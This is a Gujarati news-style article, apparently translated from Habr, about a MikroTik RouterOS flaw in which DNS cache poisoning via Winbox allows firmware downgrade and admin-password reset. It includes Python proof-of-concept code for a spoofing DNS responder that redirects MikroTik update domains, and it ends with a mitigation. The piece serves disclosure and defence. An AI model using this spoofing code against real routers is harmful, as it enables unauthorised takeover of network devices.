🥇 RouterOS માં બેકપોર્ટ નબળાઈ સેંકડો હજારો ઉપકરણોને જોખમમાં મૂકે છે

RouterOS (Mikrotik) પર આધારિત ઉપકરણોને રિમોટલી ડાઉનગ્રેડ કરવાની ક્ષમતા સેંકડો હજારો નેટવર્ક ઉપકરણોને જોખમમાં મૂકે છે. નબળાઈ Winbox પ્રોટોકોલના DNS કેશના ઝેર સાથે સંકળાયેલી છે અને તમને ઉપકરણ પર જૂના (ડિફૉલ્ટ પાસવર્ડ રીસેટ સાથે) અથવા સંશોધિત ફર્મવેર લોડ કરવાની મંજૂરી આપે છે.

નબળાઈ વિગતો

RouterOS ટર્મિનલ DNS લુકઅપ માટે રિઝોલ્યુશન કમાન્ડને સપોર્ટ કરે છે.

આ વિનંતી રિઝોલ્વર તરીકે ઓળખાતી બાઈનરી દ્વારા નિયંત્રિત કરવામાં આવે છે. રિઝોલ્વર એ ઘણી દ્વિસંગીઓમાંથી એક છે જે RouterOS ના વિનબોક્સ પ્રોટોકોલ સાથે જોડાય છે. ઉચ્ચ સ્તરે, વિનબોક્સ પોર્ટ પર મોકલવામાં આવેલા "સંદેશાઓ" એરે-આધારિત નંબરિંગ સ્કીમના આધારે રાઉટરઓએસમાં વિવિધ દ્વિસંગીઓને રૂટ કરી શકાય છે.

ડિફૉલ્ટ રૂપે, RouterOS પાસે DNS સર્વર સુવિધા અક્ષમ છે.

જો કે, જ્યારે સર્વર કાર્ય અક્ષમ હોય ત્યારે પણ, રાઉટર તેની પોતાની DNS કેશ જાળવી રાખે છે.

જ્યારે આપણે ઉદાહરણ તરીકે winbox_dns_request નો ઉપયોગ કરીને વિનંતી કરીએ છીએ, ત્યારે રાઉટર પરિણામને કેશ કરશે.

કારણ કે અમે DNS સર્વરનો ઉલ્લેખ કરી શકીએ છીએ કે જેના દ્વારા વિનંતી કરવી જોઈએ, ખોટા સરનામાં દાખલ કરવા તુચ્છ છે. ઉદાહરણ તરીકે, તમે DNS સર્વર અમલીકરણને રૂપરેખાંકિત કરી શકો છો ફિલિપ ક્લાઉસIP એડ્રેસ 192.168.88.250 ધરાવતા A રેકોર્ડ સાથે હંમેશા પ્રતિસાદ આપવા માટે.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

હવે જો તમે Winbox નો ઉપયોગ કરીને example.com માટે સર્ચ કરો છો, તો તમે જોઈ શકો છો કે રાઉટરની DNS કેશ પોઈઝન થઈ ગઈ છે.

અલબત્ત, પોઈઝનિંગ example.com બહુ ઉપયોગી નથી કારણ કે રાઉટર વાસ્તવમાં તેનો ઉપયોગ કરશે નહીં. જો કે, રાઉટરને upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com અને download.mikrotik.com ઍક્સેસ કરવાની જરૂર છે. અને બીજી ભૂલ માટે આભાર, તે બધાને એક જ સમયે ઝેર આપવાનું શક્ય છે.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

રાઉટર એક પરવાનગીની વિનંતી કરે છે, અને અમે પાંચ પાછા આપીએ છીએ. રાઉટર આ તમામ પ્રતિભાવોને યોગ્ય રીતે કેશ કરતું નથી.

દેખીતી રીતે, જો રાઉટર DNS સર્વર તરીકે કામ કરતું હોય તો આ હુમલો પણ ઉપયોગી છે, કારણ કે તે રાઉટરના ક્લાયંટ પર હુમલો કરવાની મંજૂરી આપે છે.

આ હુમલો તમને વધુ ગંભીર નબળાઈનો ઉપયોગ કરવાની પણ મંજૂરી આપે છે: રાઉટરઓએસના સંસ્કરણને ડાઉનગ્રેડ અથવા બેકપોર્ટ કરો. હુમલાખોર ચેન્જલોગ સહિત અપડેટ સર્વરના તર્કને ફરીથી બનાવે છે અને રાઉટરઓએસને જૂના (સંવેદનશીલ) સંસ્કરણને વર્તમાન તરીકે સમજવા દબાણ કરે છે. અહીં ભય એ હકીકતમાં રહેલો છે કે જ્યારે સંસ્કરણ "અપડેટ" થાય છે, ત્યારે એડમિનિસ્ટ્રેટર પાસવર્ડ ડિફોલ્ટ મૂલ્ય પર રીસેટ થાય છે - હુમલાખોર ખાલી પાસવર્ડ સાથે સિસ્ટમમાં લૉગ ઇન કરી શકે છે!

આ હુમલો તદ્દન કામ કરે છે, હકીકત હોવા છતાં લેખક થી સંબંધિત સહિત ઘણા વધુ વેક્ટર્સનો અમલ કરે છે ફર્મવેરમાં બેકડોર એમ્બેડ કરવું, પરંતુ આ પહેલેથી જ એક બિનજરૂરી તકનીક છે અને ગેરકાયદેસર હેતુઓ માટે તેનો ઉપયોગ ગેરકાયદેસર છે.

રક્ષણ

ફક્ત Winbox ને અક્ષમ કરવાથી તમે આ હુમલાઓથી તમારી જાતને સુરક્ષિત કરી શકો છો. Winbox દ્વારા વહીવટની સુવિધા હોવા છતાં, SSH પ્રોટોકોલનો ઉપયોગ કરવો વધુ સારું છે.

સોર્સ: www.habr.com

RouterOS માં બેકપોર્ટ નબળાઈ સેંકડો હજારો ઉપકરણોને જોખમમાં મૂકે છે

નબળાઈ વિગતો

રક્ષણ

એક ટિપ્પણી ઉમેરો જવાબ રદ